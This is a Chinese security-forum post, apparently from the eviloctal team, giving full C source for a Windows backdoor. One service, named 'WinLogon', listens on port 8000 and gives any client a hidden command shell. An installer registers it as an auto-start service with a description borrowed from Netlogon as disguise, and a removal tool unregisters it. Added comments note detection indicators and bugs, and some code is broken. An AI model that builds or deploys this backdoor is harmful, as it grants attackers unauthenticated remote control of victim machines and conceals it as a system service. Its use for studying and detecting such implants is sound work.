信息来源:邪恶八进制信息安全团队( www.eviloctal.com)
1、后门服务的代码:backforservice1.c
/**/ /* 在本机开到服务端口8000,也可以换成其它的反弹型后门*/
#include < winsock2.h >
#include < windows.h >
#include < stdio.h >
// 预编译指令,下面是设置连接器link中的project options,连接器选项值请参考MSDN:
/**/ /*#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:main")//用来屏蔽控制台应用程序的窗口
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=DNA32r /SECTION:DNA32r,EWR")*/
#pragma comment(lib, " ws2_32.lib " ) // 链接到WS2_32.LIB库
#define MasterPort 8000 // 连接端口
/**/
// Declare several global variables to share
// their values across multiple functions of your program.
/**/
/* Shared service state.  ServiceStatus is the record handed to the SCM on every
 * state change and hStatus is the handle RegisterServiceCtrlHandler() returns in
 * ServiceMain(); ControlHandler() reports through the same handle.  Both are
 * touched from the service-main path and the control-handler path with no
 * synchronisation anywhere in this file. */
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
/**/
// Make the forward definitions of functions prototypes.
//
/**/
/* Prototypes.  ServiceMain is handed to the SCM through the service table in
 * main(); ControlHandler is registered from ServiceMain; Entrypoint is the
 * worker that ServiceMain runs once the service reports RUNNING. */
void ServiceMain( int argc, char ** argv);
void ControlHandler(DWORD request);
void Entrypoint();
// Control Handler
/* SCM control handler.
 *
 * STOP and SHUTDOWN are handled identically: report exit code 0 and state
 * SERVICE_STOPPED.  Nothing here signals Entrypoint(), which may still be
 * blocked in accept() or WaitForSingleObject(); the state change is reported
 * to the SCM while the worker and its child process are left as they are.
 * Any other control code only re-reports the current ServiceStatus.
 *
 * @param request  control code delivered by the SCM. */
void ControlHandler(DWORD request)
{
    switch(request)
    {
    case SERVICE_CONTROL_STOP:
        /* Debug-output string, visible to any attached debug-output listener. */
        OutputDebugString("Monitoring stopped.");
        //printf("Monitoring stopped.\n");
        ServiceStatus.dwWin32ExitCode = 0;
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        SetServiceStatus (hStatus, &ServiceStatus);
        return;
    case SERVICE_CONTROL_SHUTDOWN:
        /* Same handling as STOP; the two cases could share code. */
        OutputDebugString("Monitoring stopped.");
        //printf("Monitoring stopped.\n");
        ServiceStatus.dwWin32ExitCode = 0;
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        SetServiceStatus (hStatus, &ServiceStatus);
        return;
    default:
        break;
    }
    /* Report current status unchanged for every other control code. */
    SetServiceStatus (hStatus, &ServiceStatus);
    return;
}
/* Service entry called by the SCM through the table set up in main().
 *
 * Fills in ServiceStatus, registers ControlHandler() under the service name
 * "WinLogon", reports RUNNING and then calls Entrypoint() on this thread, so
 * the function does not return until Entrypoint() does.  argc/argv are unused.
 *
 * Review notes:
 *  - The name "WinLogon" borrows the name of a Windows logon component; a
 *    service registered under it is a useful hunting indicator, since the real
 *    winlogon is not installed as a service.
 *  - dwServiceType is SERVICE_WIN32 here while the installer registers the
 *    service as SERVICE_WIN32_SHARE_PROCESS; presumably the SCM tolerates the
 *    mismatch, but the two should agree.
 *  - On registration failure the function returns silently; no error is
 *    logged and the SCM is never told the service failed to start. */
void ServiceMain( int argc, char ** argv)
{
    ServiceStatus.dwServiceType = SERVICE_WIN32;
    ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint = 0;
    ServiceStatus.dwWaitHint = 0;
    hStatus = RegisterServiceCtrlHandler(
        "WinLogon",
        (LPHANDLER_FUNCTION)ControlHandler);
    if (hStatus == (SERVICE_STATUS_HANDLE)0)
    {
        // Registering the control handler failed; nothing is reported.
        return;
    }
    // Report the running status to the SCM before starting the worker.
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus (hStatus, &ServiceStatus);
    Entrypoint();
    return;
}
/* Service worker: a single-connection listener that hands an interactive
 * command interpreter to whoever connects.
 *
 * Behaviour as written:
 *  - listens on every local interface (INADDR_ANY) on TCP port MasterPort (8000);
 *  - accepts exactly one client;
 *  - launches the program named by %COMSPEC% with stdin/stdout/stderr set to
 *    the accepted socket and bInheritHandles = TRUE, window hidden;
 *  - waits for that child to exit, then closes everything and returns, so the
 *    service does no further work after the first session.
 *
 * Detection/response notes for defenders: the observable footprint is a
 * service-hosted process listening on 8000, and a child command interpreter
 * whose standard handles are an inherited socket; a network capture of that
 * session is plaintext.
 *
 * Robustness notes (not changed here): no return value of WSAStartup, bind,
 * listen, accept or CreateProcess is checked, so a busy port or a failed
 * accept still proceeds to CreateProcess with an invalid handle; szCMDPath is
 * uninitialised and is passed to CreateProcess even if COMSPEC is unset. */
void Entrypoint()
{
    WSADATA WSADa;
    SOCKADDR_IN SockAddrIn;
    SOCKET CSocket,SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo; // process information block (textbook p.136)
    STARTUPINFO StartupInfo;         // startup info (textbook refs: core ch.4 p.20, advanced p.63)
    char szCMDPath[255];
    //------------------- zero the structures
    ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
    ZeroMemory(&WSADa, sizeof(WSADATA));
    //---- initialise data ----
    // Fetch the command interpreter path; bounded by sizeof(szCMDPath), return value unchecked (textbook p.143):
    GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));//p.143
    // Load ws2_32.dll and initialise Winsock 2.2:
    WSAStartup(0x0202,&WSADa);// same as WSAStartup(MAKEWORD(2,2),&wsaData);
    // Local address to bind:
    SockAddrIn.sin_family = AF_INET; // IPv4
    SockAddrIn.sin_addr.s_addr = INADDR_ANY; // every local interface
    SockAddrIn.sin_port = htons(MasterPort); // listening port
    // WSASocket with dwFlags = 0 rather than socket(): presumably chosen so the
    // socket is created non-overlapped and can be used as a std handle below — confirm.
    CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); // create the listening socket
    // Bind and listen (backlog 1); errors ignored:
    bind(CSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
    listen(CSocket,1);
    iAddrSize = sizeof(SockAddrIn);
    SSocket = accept(CSocket,(SOCKADDR *)&SockAddrIn,&iAddrSize);// blocks for one client; SSocket is the connected socket
    // Prepare the child process (the original comment called this "connect to the remote server"; it is not a connect):
    StartupInfo.cb = sizeof(STARTUPINFO);
    StartupInfo.wShowWindow = SW_HIDE;// hidden window
    StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    // Point the child's standard handles at the connected socket SSocket:
    StartupInfo.hStdInput = (HANDLE)SSocket;
    StartupInfo.hStdOutput = (HANDLE)SSocket;
    StartupInfo.hStdError = (HANDLE)SSocket;
    // Launch %COMSPEC% with handle inheritance on (the original comment said
    // "create anonymous pipe"; no pipe is created, the socket itself is inherited):
    CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
    WaitForSingleObject(ProcessInfo.hProcess, INFINITE);// p.142: wait until the process named by hProcess terminates
    CloseHandle(ProcessInfo.hProcess);// close the process and thread handles
    CloseHandle(ProcessInfo.hThread);
    closesocket(CSocket);// close both sockets
    closesocket(SSocket);
    WSACleanup();// release all Winsock resources and cancel pending Winsock calls
    // connection closed, ws2_32.dll unloaded
    return;
}
/* Process entry point.
 *
 * Registers a one-entry service table naming "WinLogon" -> ServiceMain and
 * hands the thread to the SCM's control dispatcher, which returns only when
 * every service in the table has stopped.  Its return value is not checked, so
 * if the executable is launched from a console rather than by the SCM the call
 * fails and the process simply exits.  `void main` is non-standard; `int main`
 * is the portable form. */
void main( int argc, char * argv[])
{
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "WinLogon";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
    ServiceTable[1].lpServiceName = NULL;   // terminator entry
    ServiceTable[1].lpServiceProc = NULL;
    // Start the control dispatcher thread for our service
    StartServiceCtrlDispatcher(ServiceTable);
}
2、下面是创建服务的代码:services2.c
#include < windows.h >
#include < stdio.h >
/* Installer: registers backforservice1.exe with the SCM as an auto-start
 * service named "WinLogon" and starts it.
 *
 * What a defender should recognise here:
 *  - service name and display name "WinLogon", with a description string that
 *    reads "Maintains a secure channel between this computer and the domain
 *    controller for authenticating users and services" — wording that appears
 *    to mirror the built-in Netlogon service description;
 *  - SERVICE_AUTO_START, so the listener comes back on every boot;
 *  - the image path is a hard-coded development directory (buff).
 *
 * Code notes (unchanged): the printf in the OpenSCManager failure path has no
 * conversion specifier for hEorr (most likely lost when the listing was
 * posted) and the literal is broken across two lines; exit() is used without
 * <stdlib.h>; return values of ChangeServiceConfig2 and StartService are not
 * checked; ChangeServiceConfig2 is passed &Info, an LPVOID holding the string,
 * which only works because SERVICE_DESCRIPTION is a struct of one LPSTR. */
int main( void )
{
    char* buff;
    SC_HANDLE hSCManager,hService;
    DWORD hEorr;
    LPVOID Info;
    Info="为用户和服务身份验证维护此计算机和域控制器之间的安全通道。";
    //buff="c:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\MemoryStatus\\Debug\\MemoryStatus.exe";
    buff="C:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\Debug\\backforservice1.exe";
    // Step 1: open the SCM with full access (requires administrator rights):
    hSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//SC_MANAGER_CREATE_SERVICE);
    if (hSCManager == NULL)
    {
        hEorr =GetLastError();
        printf("Open SCManager false
..\n",hEorr);
        exit(0);
    }
    // Step 2: create the service (share-process type, auto-start, errors ignored at boot):
    hService = CreateService(hSCManager,"WinLogon","WinLogon",SERVICE_ALL_ACCESS, SERVICE_WIN32_SHARE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,buff, NULL, NULL, NULL, NULL, NULL);//SERVICE_START+DELETE
    if (hService!=NULL)
    { printf("Create service success!\n");
        // Set the description shown in the services console:
        ChangeServiceConfig2(hService,SERVICE_CONFIG_DESCRIPTION,&Info);
        // Step 3: start the service:
        StartService(hService,0,NULL);
    }
    else
    {printf("Create service error!\n");
    }
    CloseServiceHandle(hSCManager);// close the SCM handle
    CloseServiceHandle(hService);  // hService may be NULL here
    return 0;
}
3、下面是删除服务的代码:deleteservice.c
#include < windows.h >
#include < stdio.h >
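/* Removal tool: unregisters the service installed under the name "WinLogon".
 *
 * Steps: open the SCM, open the service, ask it to stop (best effort), then
 * mark it for deletion.  DeleteService() only marks the entry; the SCM removes
 * it once the service is stopped and every open handle to it is closed, which
 * is why both handles are closed before returning.
 *
 * Only the access rights actually needed are requested (SC_MANAGER_CONNECT on
 * the manager, SERVICE_STOP | DELETE on the service) instead of *_ALL_ACCESS.
 *
 * Returns 0 when the deletion request was accepted, 1 when the SCM or the
 * service could not be opened or DeleteService() failed.  Every failure prints
 * the GetLastError() code so it can be looked up (the original printf had lost
 * its conversion specifier and spanned two lines, which does not compile). */
int main( void )
{
    SC_HANDLE hSCManager = NULL;
    SC_HANDLE hService = NULL;
    SERVICE_STATUS status;
    int rc = 1;

    /* Step 1: connect to the SCM.  Needs administrator rights. */
    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
    if (hSCManager == NULL)
    {
        printf("Open SCManager failed, error %lu..\n", (unsigned long)GetLastError());
        return 1;
    }

    /* Step 2: open the service with just the rights needed to stop and delete it. */
    hService = OpenService(hSCManager, "WinLogon", SERVICE_STOP | DELETE);
    if (hService == NULL)
    {
        printf("Delete service error! (OpenService failed, error %lu)\n",
               (unsigned long)GetLastError());
        goto out;
    }

    /* Step 3: request a stop first.  Best effort: the service may not be
     * running, or may not honour the stop promptly; deletion is requested
     * either way and the SCM completes it once the service has stopped. */
    if (!ControlService(hService, SERVICE_CONTROL_STOP, &status))
    {
        printf("Stop request not accepted, error %lu (continuing)\n",
               (unsigned long)GetLastError());
    }

    /* Step 4: mark the service for deletion. */
    if (DeleteService(hService))
    {
        printf("Delete service success!\n");
        rc = 0;
    }
    else
    {
        printf("Delete service error! (DeleteService failed, error %lu)\n",
               (unsigned long)GetLastError());
    }

out:
    /* Close the service handle before the manager handle; a NULL hService is
     * never passed to CloseServiceHandle. */
    if (hService != NULL)
    {
        CloseServiceHandle(hService);
    }
    CloseServiceHandle(hSCManager);
    return rc;
}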